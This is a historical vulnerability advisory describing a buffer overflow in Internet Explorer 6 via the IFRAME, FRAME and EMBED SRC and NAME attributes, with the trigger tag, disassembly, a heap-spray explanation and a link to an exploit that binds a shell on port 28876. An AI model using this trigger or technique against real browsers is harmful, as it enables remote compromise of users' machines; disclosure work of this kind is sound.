From Skypher← Back to www.edup.tudelft.nl/~bjwever/
Internet Explorer IFRAME src&name parameter BoF remote compromise
There is an exploitable BoF in the FRAME, EMBED and IFRAME tag using the SRC and NAME property. To trigger the BoF you only need this tag in a HTML file:
- <IFRAME SRC=AAAAAAAAAAAA.... NAME="BBBBBBBBBBB....">
This will overwrite EAX with
0x00420042, after which this code gets executed:
7178EC02 8B08 MOV ECX, DWORD PTR [EAX] 7178EC04 68 847B7071 PUSH SHDOCVW.71707B84 7178EC09 50 PUSH EAX 7178EC0A FF11 CALL NEAR DWORD PTR [ECX]
Control over EAX leads to control over ECX, which you can use to control EIP: Remote Command Execution.
The problem exists in Internet Explorer 6.0, on Win2K and WinXP (all service packs, except XP/SP2)
exploits/InternetExploiter.zip contains InternetExploiter.html, the actual exploit. When you open this .html file in MSIE, it will try to exploit the vulnerability to bind a shell to port 28876.
[0x0D0D0D0D] == 0x0D0D0D0D. It's not the most efficient thing in the world but it works like a charm for most IE bugs. The BoF sets eax to
0x0D0D0D0D after which the above mentioned code gets executed, so we jump to
0x0D0D0D0D. We land inside one of the nopslide and slide on down to the shellcode.
The shellcode is encoded into a unicode string using my own Beta shellcode encoder.
|2004-10-24||ned discovers bug in IE.|
|2004-10-25||Bug turns out to be Bof, advisory released.|
Available from the Microsoft Corporation website.
- exploits/InternetExploiter.zip: Internet Explorer IFRAME src&name parameter BoF remote compromise exploit.
- beta shellcode encoder: Documentation.
- src/beta.c C Source file for the current version of beta shellcode encoder.
- CERT: Microsoft Internet Explorer vulnerable to buffer overflow via FRAME, IFRAME, and EMBED elements.
- Secunia: Internet Explorer IFRAME Buffer Overflow Vulnerability.
- ZDNet news: Exploit code makes IE flaw more dangerous.
- Techworld: Microsoft stalls on vast Explorer exploit.
- Wall Street Journal: "Mydoom Worm Renews Debate On Cyber-Ethics" by David Bank.
- Microsoft Corporation website: Cumulative Security Update for Internet Explorer (889293)